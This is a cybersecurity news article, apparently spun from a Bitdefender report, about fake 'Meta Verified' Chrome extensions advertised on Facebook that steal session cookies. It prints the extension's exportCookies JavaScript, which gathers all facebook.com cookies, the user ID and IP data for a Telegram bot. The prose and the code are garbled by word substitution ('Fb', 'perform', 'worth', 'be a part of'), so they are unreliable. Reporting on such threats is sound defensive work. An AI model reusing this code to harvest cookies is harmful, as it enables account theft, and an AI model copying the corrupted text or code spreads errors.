Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details

Posted on September 10, 2025September 10, 2025 By CWS

Malicious actors have launched a classy malvertising marketing campaign on Fb that coerces unsuspecting customers into putting in a pretend “Meta Verified” browser extension.

Promoted by way of seemingly legit video tutorials, these advertisements promise to unlock the coveted blue verification tick with out paying Meta’s subscription price.

In actuality, the extension is engineered to reap delicate consumer knowledge, together with session cookies, entry tokens, and IP addresses.

By leveraging trusted platforms like Field.com for internet hosting, attackers guarantee excessive availability and evade easy URL-blocking defenses, making the rip-off seem each genuine and risk-free.

Upon nearer inspection, the video tutorials accompanying the advertisements bear the fingerprints of Vietnamese-speaking menace actors, with narration and code feedback written in Vietnamese.

The extension’s code, though clumsily obfuscated and certain generated by an AI-assisted toolkit, nonetheless successfully exfiltrates knowledge.

Bitdefender analysts recognized using the Fb Graph API to question Enterprise account data as soon as legitimate entry tokens are acquired, permitting attackers to differentiate high-value company profiles from private accounts.

Malicious browser extension advert (Supply – Bitdefender)

Victims who comply with the tutorial unwittingly grant the extension permissions to learn and export cookies from the fb.com area.

As soon as put in, the extension instantly invokes an exportCookies perform that compiles each cookie right into a formatted string earlier than transmitting it to a Telegram bot managed by the attackers.

Cookie export perform (Supply – Bitdefender)

To additional personalize the stolen knowledge, the malware queries to append geolocation particulars, bolstering its marketability on underground boards.

Bitdefender researchers famous that variants of this extension embody adjustable parameters for tick dimension and place, suggesting an automatic pipeline for producing new marketing campaign property with minimal guide effort.

The modular design additionally helps automated execution upon Chrome startup, guaranteeing persistent knowledge harvesting even when customers disable and re-enable the extension.

An infection Mechanism Deep Dive

The core of the an infection mechanism lies within the malicious extension’s background script, which hooks into Chrome’s cookies API to extract session tokens with out triggering consumer prompts.

After set up—triggered by clicking on an advert hyperlink—the extension makes use of chrome.cookies.getAll({ area: “fb.com” }, callback) to assemble cookies.

Inside the callback, it constructs the payload:-

async perform exportCookies() {
chrome.cookies.getAll({ area: “fb.com” }, async cookies => {
const cookieString = cookies. Map(c => `${c.identify}=${c.worth}`).be a part of(“;”);
const userId = cookies. Discover(c => c.identify === “c_user”)?.worth || “Unknown”;
const ipInfo = await fetch(”).then(r => r.json()).catch(() => ({}));
const payload = `ID: ${userId}nIP: $ “Unknown”nCookies: ${cookieString}`;
sendToTelegram(payload);
});
}

This streamlined method bypasses many endpoint-based detections, whereas using legit domains for internet hosting and command-and-control reduces the probability of speedy takedown.

Safety groups ought to monitor irregular cookie export exercise and implement rigorous extension vetting to defend in opposition to such industrialized malvertising threats.

Enhance your SOC and assist your staff defend what you are promoting with free top-notch menace intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:Account, Ads, Beware, Details, Facebook, Malicious, Meta, Steals, User, Verified

Post navigation

Previous Post: Chinese APT Deploys EggStreme Fileless Malware to Breach Philippine Military Systems
Next Post: AsyncRAT Uses Fileless Loader to Bypass Detections and Gain Remote Access

Related Posts

Albemarle County Hit By Ransomware Attack Cyber Security News
CrowdStrike Set to Acquire Onum in $290 Million Deal to Enhance Falcon Next-Gen SIEM Cyber Security News
PoisonSeed Phishing Kit Bypasses MFA to Acquire Credentials from Individuals and Organizations Cyber Security News
Windows Common Log File System 0-Day Vulnerability Actively Exploited in the Wild Cyber Security News
AI Crawlers Reshape The Internet With Over 30% of Global Web Traffic Cyber Security News
Threat Actors Abuse AI Website Creation App to Deliver Malware Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • How to Use Multi-Factor Authentication for Online Services
  • Cursor AI Code Editor RCE Vulnerability Enables “autorun” of Malicious on your Machine
  • Jaguar Land Rover Confirms Hackers Stole Data in Ongoing Cyberattack
  • CyberVolk Ransomware Attacking Windows System in Critical Infrastructure and Scientific Institutions
  • AsyncRAT Uses Fileless Loader to Bypass Detections and Gain Remote Access

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • How to Use Multi-Factor Authentication for Online Services
  • Cursor AI Code Editor RCE Vulnerability Enables “autorun” of Malicious on your Machine
  • Jaguar Land Rover Confirms Hackers Stole Data in Ongoing Cyberattack
  • CyberVolk Ransomware Attacking Windows System in Critical Infrastructure and Scientific Institutions
  • AsyncRAT Uses Fileless Loader to Bypass Detections and Gain Remote Access

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News